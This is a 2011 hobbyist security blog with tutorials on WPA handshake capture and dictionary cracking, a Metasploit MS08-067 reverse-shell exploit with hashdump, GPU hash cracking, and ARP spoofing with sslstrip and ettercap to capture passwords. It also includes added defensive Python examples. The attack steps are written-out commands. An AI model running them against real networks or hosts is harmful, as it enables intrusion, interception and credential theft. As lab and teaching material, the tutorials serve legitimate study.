Saturday 2 July 2011

Cracking WPA using pyrit and aircrack

Hi all,

This is the follow-on post to the pyrit set-up.
Once it's been set up you can test the strength of your WPA-encrypted router's key.

There are a few important points to note when cracking WPA.
Firstly, it has to be your own router, or you must have permission from the administrator.
Secondly, the key you're cracking has to be inside the list or dictionary file.
If the password isn't in the dictionary file, the key will not be cracked.
Note that 'insecurepass' is different to 'Insecurepass' (the comparison is case-sensitive).
Finally, the access point has to have a client connected, because during the process of capturing a handshake the client is de-authenticated so that it reconnects, allowing the handshake to be recaptured.

The method behind WPA cracking is different to that of WEP. WEP is cracked by collecting repeated IV packets. WPA is cracked by first capturing the handshake, where the client connects to the AP, and then brute-forcing it offline using a dictionary or word list.

The commands:
airmon-ng
airmon-ng start wlan0
airodump-ng mon0
airodump-ng -c 11 -w output --bssid <AP BSSID> mon0
aireplay-ng --deauth 0 -a <AP BSSID> -c <client MAC> mon0

Ctrl + C to cancel the deauth and capture

pyrit eval
pyrit -i pass.lst import_passwords
pyrit -e j2neonAP create_essid
pyrit eval
pyrit batch
pyrit verify
pyrit -o wpadb export_hashdb

aircrack-ng -r wpadb output-01.cap
Commands will differ for each WPA crack and access point. Firstly, -c is the channel of the AP; mine's on 11. -w is simply the name prefix of the output file, and each BSSID is different.
In the pyrit section, pass.lst is a simple list that I created for the purpose of this vid and contains a few keys. This should be replaced with a decent word list or password list.
j2neonAP is my ESSID; again this is different for each AP, and it is also used as a salt during the batch process.
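
To make the points above concrete (the key must be in the list exactly, case included, and the ESSID acts as a salt), here is an added Python example that is my own and not code from the post or from the pyrit project. It reproduces the derivation pyrit performs during batch: WPA/WPA2-PSK turns the passphrase into a 256-bit Pairwise Master Key with PBKDF2-HMAC-SHA1, 4096 rounds, salted with the ESSID. The ESSID "exampleAP" and the candidate words are constructed; the only real value is the published IEEE 802.11i test vector ("password"/"IEEE") used as a self-check. It shows why a table built for one ESSID is useless against another, why 'insecurepass' and 'Insecurepass' are different keys, and how a measured derivation rate turns into the time a word list of a given size takes, which is the number a defender uses when deciding how long a passphrase needs to be.

```python
import hashlib
import time

# WPA/WPA2-PSK derives the Pairwise Master Key (PMK) from the passphrase with
# PBKDF2-HMAC-SHA1, using the ESSID as the salt and 4096 iterations.
# The ESSID and candidate list below are constructed for this example.
ESSID = "exampleAP"
CANDIDATES = ["insecurepass", "Insecurepass", "letmein", "password"]
PBKDF2_ROUNDS = 4096   # fixed by the 802.11i standard
PMK_LEN = 32           # 256-bit key

# Known-answer vector published in IEEE 802.11i (passphrase "password", SSID "IEEE").
KAT_PMK = bytes.fromhex(
    "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")


def wpa_pmk(essid: str, passphrase: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=ESSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               essid.encode("utf-8"), PBKDF2_ROUNDS, PMK_LEN)


def self_test() -> bool:
    """Check the derivation against the standard's published test vector."""
    return wpa_pmk("IEEE", "password") == KAT_PMK


def pmk_table(essid: str, candidates) -> dict:
    """Precompute one PMK per candidate for a single ESSID. This is what
    'pyrit batch' does at scale; the table only applies to that ESSID."""
    return {c: wpa_pmk(essid, c) for c in candidates}


def essid_changes_pmk(passphrase: str, essid_a: str, essid_b: str) -> bool:
    """True when the same passphrase yields different PMKs under two ESSIDs."""
    return wpa_pmk(essid_a, passphrase) != wpa_pmk(essid_b, passphrase)


def seconds_to_exhaust(n_candidates: int, pmks_per_second: float) -> float:
    """Time needed to derive a PMK for every candidate at the given rate."""
    return n_candidates / pmks_per_second


def measure_rate(essid: str, samples: int = 50) -> float:
    """Rough single-core CPU rate in PMK/s; a GPU core in pyrit is far faster."""
    start = time.perf_counter()
    for i in range(samples):
        wpa_pmk(essid, f"candidate{i}")
    return samples / (time.perf_counter() - start)


if __name__ == "__main__":
    assert self_test(), "PBKDF2 derivation does not match the 802.11i vector"
    table = pmk_table(ESSID, CANDIDATES)
    print("insecurepass and Insecurepass share a PMK?",
          table["insecurepass"] == table["Insecurepass"])
    print("same passphrase, other ESSID, different PMK?",
          essid_changes_pmk("insecurepass", ESSID, "otherAP"))
    rate = measure_rate(ESSID)
    hours = seconds_to_exhaust(10_000_000, rate) / 3600
    print(f"~{rate:.0f} PMK/s on this CPU; a 10-million-word list takes ~{hours:.1f} h")
```

The 4096-round PBKDF2 is the whole reason pyrit exists: every candidate costs thousands of HMAC operations, so precomputing tables on a GPU pays off only when the ESSID is known in advance, and a random passphrase that is not in any list is never reached at all.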

Videos:

Blip.tv link:
Cracking WPA using pyrit and aircrack Blip.tv

YouTube link:
Cracking WPA using pyrit and aircrack YouTube

Sorry again for the square mouse cursor; Camtasia, VB and BT5 don't play together nicely.

Thanks
2neon

Friday 1 July 2011

Installing pyrit into BT5

Hey all,

It's been a while again since the last video. I have spent some serious time doing boot-to-roots and the Metasploit Unleashed tutorial. Anyway, this is a two-part post: the first being the set-up and the second being WPA cracking using pyrit.

That having been said, I'll get on with it!

Pyrit is used to create hash tables, which can then be used to crack WPA and test how secure the wireless key is. In this post the primary objective is to download and install all of the necessary components for pyrit.

Pyrit also supports GPU processing, so as I have an Nvidia card, I will be setting up pyrit to run using CUDA. This step is optional and will be different if you are using AMD/ATi.

It's also a good idea to run pyrit list_cores to make sure that it's all working correctly, and if you want to see the speed of the cores, run the benchmark.

Commands

These commands are taken from another thread on the BackTrack forum, as they are the best way to install it and have come up in posts multiple times.

svn checkout http://pyrit.googlecode.com/svn/trunk/ pyrit_svn

apt-get install libssl-dev scapy python-dev
cd pyrit_svn/pyrit
python setup.py build
python setup.py install

CUDA/Nvidia only!

Then download the nvidia-toolkit from:

http://developer.nvidia.com/cuda-toolkit-32-downloads

Download the CUDA Toolkit for Ubuntu Linux 10.04. It doesn't matter if you already have the graphics drivers, as you will need this anyway because it contains the compilers. Also, if you accidentally download the dev drivers instead, you won't be able to install pyrit, as you need this toolkit!

sh cudatoolkit_3.2.16_linux_64_ubuntu10.04.run
cd pyrit_svn/cpyrit_cuda
python setup.py build
python setup.py install

pyrit list_cores
pyrit benchmark
Videos

Youtube:
Installing pyrit into BT5 YouTube

Blip.tv:
Installing pyrit into BT5 Blip.tv

Cheers
2neon

Wednesday 8 June 2011

ssh with x11 and ftp in bt5

Hey all,

Well, it's been a while, and now that university is done with and I've had time to play with BT5 (which is the all-new and shiny BackTrack) it's time for a blog post 8-).

Right, so the concept is similar to remote desktop, but you only have a shell. This is also secure, well, as secure as you can make it.

This allows you to connect to one PC and run scripts, tool kits and programs on it from a second one.
The programs are still running on the first BackTrack machine, just accessible from the second machine.
This is useful if you are out and about doing work/pentesting and need the power of the second machine.

Other than this, it's useful for internet cafe usage, as it will allow you to browse more securely.

The steps;

sshd-generate
/etc/init.d/ssh start
update-rc.d ssh defaults
ifconfig

This is all of the configuration 'needed'; however, it's possible to use techniques such as fail2ban, setting different ports on the router, or simply changing the port ssh listens on in BackTrack. ifconfig just checks the internal I.P. update-rc.d adds ssh to start-up, which is not needed but will stop you typing /etc/init.d... every time.

Windows steps;

Download and install PuTTY, or just grab the Xming server, as I believe PuTTY is bundled with it.
If you want secure FTP, grab FileZilla.

Run all the installers and then open up PuTTY.

Insert the I.P., either internal or external.
Enable X11 forwarding under the SSH tab and type localhost:0.
Click Open to connect.
Type in the user name and password. *This may take some time.*
And that should be it; if X11 is working you should get graphical programs like Firefox etc.

For FTP, make sure port 22, which is the default for SSH, is selected.
Biggest point here: *If you are doing this across the internets, make sure you have a long password and think about changing the port or implementing fail2ban.*
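
Since the post leaves "changing the port or implementing fail2ban" as advice, here is an added Python example, my own and not part of the post, showing the two checks behind that advice: a minimal version of what fail2ban does (count failed password attempts per source address in sshd's auth.log lines and flag any source over a retry limit), and a lookup of sshd_config directives (Port, PasswordAuthentication) the way sshd reads them, first occurrence wins. The log lines and the config fragment are constructed for the example and use TEST-NET addresses; the hostname "bt" and the 2222 port are assumptions.

```python
import re
from collections import Counter

# Constructed sshd log lines in syslog format (not taken from the post).
SAMPLE_AUTH_LOG = """\
Jul  8 10:12:01 bt sshd[2101]: Failed password for root from 203.0.113.5 port 51234 ssh2
Jul  8 10:12:03 bt sshd[2101]: Failed password for root from 203.0.113.5 port 51235 ssh2
Jul  8 10:12:05 bt sshd[2103]: Failed password for invalid user admin from 203.0.113.5 port 51236 ssh2
Jul  8 10:12:07 bt sshd[2104]: Failed password for root from 203.0.113.5 port 51237 ssh2
Jul  8 10:12:09 bt sshd[2105]: Failed password for root from 203.0.113.5 port 51238 ssh2
Jul  8 10:15:40 bt sshd[2110]: Failed password for root from 198.51.100.9 port 40011 ssh2
Jul  8 10:16:02 bt sshd[2112]: Accepted password for root from 198.51.100.9 port 40012 ssh2
"""

# Constructed sshd_config fragment: port moved off 22, passwords still allowed.
SAMPLE_SSHD_CONFIG = """\
# Port 22
Port 2222
PasswordAuthentication yes
X11Forwarding yes
"""

# Matches both "Failed password for root ..." and "... for invalid user admin ...".
FAILED_RE = re.compile(
    r"sshd\[\d+\]: Failed password for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<ip>[\d.]+) port \d+")


def failed_logins_by_ip(log_text: str) -> Counter:
    """Count failed password attempts per source address."""
    counts = Counter()
    for line in log_text.splitlines():
        m = FAILED_RE.search(line)
        if m:
            counts[m.group("ip")] += 1
    return counts


def offenders(log_text: str, maxretry: int = 5) -> list:
    """Sources that hit the retry limit; fail2ban would ban these via iptables."""
    return sorted(ip for ip, n in failed_logins_by_ip(log_text).items()
                  if n >= maxretry)


def sshd_setting(config_text: str, directive: str, default=None):
    """Return a directive's value as sshd would see it: comments are skipped,
    names are case-insensitive, and the first occurrence wins."""
    for line in config_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0].lower() == directive.lower():
            return parts[1].strip()
    return default


def hardening_findings(config_text: str) -> list:
    """Names of directives still at the settings the post warns about."""
    findings = []
    if sshd_setting(config_text, "Port", "22") == "22":
        findings.append("Port")
    if sshd_setting(config_text, "PasswordAuthentication", "yes").lower() == "yes":
        findings.append("PasswordAuthentication")
    return findings


if __name__ == "__main__":
    print("failures per source:", dict(failed_logins_by_ip(SAMPLE_AUTH_LOG)))
    print("would be banned at maxretry=5:", offenders(SAMPLE_AUTH_LOG))
    print("sshd listens on port", sshd_setting(SAMPLE_SSHD_CONFIG, "Port", "22"))
    print("directives to look at:", hardening_findings(SAMPLE_SSHD_CONFIG))
```

Moving the port only reduces log noise from scanners; the counting logic is what actually limits guessing, and a long password (or keys, with PasswordAuthentication off) is what makes the remaining attempts harmless.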

Video here:
ssh in bt5

Also on YouTube, watch it in 720p for clarity

Cheers
2neon

Sunday 15 May 2011

Metasploit xp sp2 exploit

Hi all,

This time I have been playing with Metasploit and wow, it's pretty cool. Obviously this is quite well used, well known and regularly updated. As it is the first time that I have used it, I decided to make a vid and quick tutorial on how to do it.

So, first off, I set up a vulnerable XP SP2 box, the vulnerability being that Microsoft made it, teehee!
Then I used BackTrack 4 with Metasploit installed to use the ms08_067_netapi exploit.

Firstly update the framework:
cd /pentest/exploits/framework3
svn up

Once this has finished, hit cd to get back to root:
nmap -O 192.168.0.1
msfconsole
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.0.127  (this is the victim's I.P.)
set PAYLOAD windows/meterpreter/reverse_tcp
show options
set LHOST <I.P. of your PC>
exploit    (this runs the exploit)
If all went well you should have a meterpreter shell open.

I then used some of the commands within the meterpreter to see how good it was!
sysinfo
ipconfig
help
hashdump
screenshot
shell

Video here:
metasploit xpsp2

Cheers.
2neon

Monday 9 May 2011

Cuda-multiforcer

Righty then, 

This looks at how to crack hashes on the computer's GPU. The reason for this is that the parallel architecture of graphics cards makes certain programs so much faster to run; in this case it's perfect for cracking hashes.
CUDA programs have to be specifically written to run on the GPU, and you cannot run anything else on there! Also, CUDA is Nvidia-only; ATi has something similar.

Right onwards...

Cuda-multiforcer isn't on the BackTrack 4 ISO, but it is in the repositories, therefore:

apt-get install cuda-multiforcer
is all that is needed.

When cuda-multiforcer was first run I received an error:
./CUDA-Multiforcer: error while loading shared libraries: libargtable2.so.0: cannot open shared object file: No such file or directory.

After some googling, the fix was simple: copy the contents of
/pentest/passwords/cuda-multiforcer/lib32
to
/lib

Ok, running cuda-multiforcer:

cd /pentest/passwords/cuda-multiforcer
./CUDA-Multiforcer -c charsets/charsetlowercasenumeric -f /root/j2neon/hash.txt --min 3 --max 6 -h MD5

Ok, the options:
-c is the character set, chosen from the charsets folder depending on what you need
-f is the location of the file containing the hashes
--min minimum password length in characters
--max maximum password length in characters
-h hash type

Video:

The passwords were short but it's still seriously fast!

Until next time.
Cheers 
2neon

Thursday 28 April 2011

What's to come?

Hey all,

As it has again been ages since any real updates I thought I would explain what's going on!
I finished my paper for university, which was on password cracking using parallel processors, my results will be on here but not just yet.

Now I've been playing with GPU related stuff there is going to be a fair amount of CUDA related security tools such as pyrit and crark.

Stay tuned, 
2neon


ARP spoof & ettercap

With a little bit of sslstrip and urlsnarf thrown in for good measure.

So, the new blog post and vid are here; this is what I did:

Firstly I edited etter.conf to allow the usage of ip tables,
then enabled ip forwarding,
next arp spoofed the broadcast address.

This step tells the router that I am the victim and tells the victim that I am the router. You can set the I.P. to that of one machine, or if you use the broadcast address, in my case 255, you can target the whole of the victim's network.

The next step is to set up iptables; this takes anything coming in on port 80, i.e. web traffic, and redirects it to port 1000, which is where sslstrip is running.

sslstrip removes the SSL encryption; this is done by removing the request from the client for the SSL certificate.

Once you have removed this you can then do whatever you wish to the victim.

I used ettercap to capture the passwords and urlsnarf to see what the victim was accessing in real time. You can also use driftnet, which shows the images from the websites that your victim is viewing.

The commands:

kate /etc/etter.conf
remove the # on the iptables lines for Linux
echo 1 > /proc/sys/net/ipv4/ip_forward (this enables ip forwarding)
you can use cat /proc/sys/net/ipv4/ip_forward to see the contents
arpspoof -i eth0 -t 192.168.0.255 192.168.0.1
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 1000
sslstrip is waiting on port 1000, so
sslstrip -a -k -f  (these options kill existing sessions and work quietly)
ettercap -T -q -i eth0
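
The attack above works because every host on the segment accepts the forged "I am the router" replies without question, and that is also what makes it visible from the defender's side. Here is an added Python example, my own and not from the post or any of the tools it uses, with the two checks a host or monitor can run: watch a stream of ARP replies and alert when an IP (the gateway in particular) suddenly maps to a new MAC, and scan an `arp -n` table for one MAC that claims several IPs, which is what the spoofer's own entry plus its forged gateway entry look like. The replies, the table text and all MACs are constructed; the gateway address 192.168.0.1 is the one used in the commands above.

```python
from collections import defaultdict

GATEWAY_IP = "192.168.0.1"  # the router address used in the post's commands

# Constructed ARP replies seen on the wire as (seconds, sender IP, sender MAC).
# At t=5 a second MAC starts answering for the gateway, as arpspoof would cause.
SAMPLE_ARP_REPLIES = [
    (0.0, "192.168.0.1",   "00:11:22:33:44:01"),  # genuine router
    (1.0, "192.168.0.127", "00:11:22:33:44:7f"),  # an ordinary client
    (5.0, "192.168.0.1",   "00:11:22:33:44:EE"),  # someone else claims the router
    (6.0, "192.168.0.1",   "00:11:22:33:44:ee"),
    (7.0, "192.168.0.1",   "00:11:22:33:44:ee"),
]

# Constructed 'arp -n' output on a victim after the spoof has taken effect.
SAMPLE_ARP_TABLE = """\
Address                  HWtype  HWaddress           Flags Mask            Iface
192.168.0.1              ether   00:11:22:33:44:ee   C                     eth0
192.168.0.50             ether   00:11:22:33:44:ee   C                     eth0
192.168.0.127            ether   00:11:22:33:44:7f   C                     eth0
"""


def detect_arp_conflicts(replies, gateway_ip=None) -> list:
    """Track the first MAC seen for each IP and alert whenever a later reply
    gives a different one. A change for the gateway is rated critical; other
    changes are warnings (DHCP reassignment can legitimately cause them)."""
    seen = {}
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()          # normalise case before comparing
        prev = seen.get(ip)
        if prev is not None and prev != mac:
            alerts.append({
                "time": ts, "ip": ip, "old_mac": prev, "new_mac": mac,
                "severity": "critical" if ip == gateway_ip else "warning",
            })
        seen[ip] = mac
    return alerts


def shared_macs(arp_table_text: str) -> dict:
    """Parse 'arp -n' output and return {mac: [ips]} for every MAC that is
    bound to more than one IP address."""
    by_mac = defaultdict(list)
    for line in arp_table_text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[1] == "ether":
            by_mac[parts[2].lower()].append(parts[0])
    return {mac: ips for mac, ips in by_mac.items() if len(ips) > 1}


if __name__ == "__main__":
    for alert in detect_arp_conflicts(SAMPLE_ARP_REPLIES, GATEWAY_IP):
        print(f"[{alert['severity']}] t={alert['time']}: {alert['ip']} moved "
              f"from {alert['old_mac']} to {alert['new_mac']}")
    for mac, ips in shared_macs(SAMPLE_ARP_TABLE).items():
        print(f"MAC {mac} claims {len(ips)} addresses: {', '.join(ips)}")
```

Only the first change for an IP is reported, so a spoofer that keeps re-sending the forged reply (arpspoof does, every couple of seconds) produces one alert rather than a flood. Static ARP entries for the gateway, or a switch with dynamic ARP inspection, stop the forged replies from taking effect in the first place; this code only tells you that they are arriving.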

The video:
Arp spoof vid

Cheers
2neon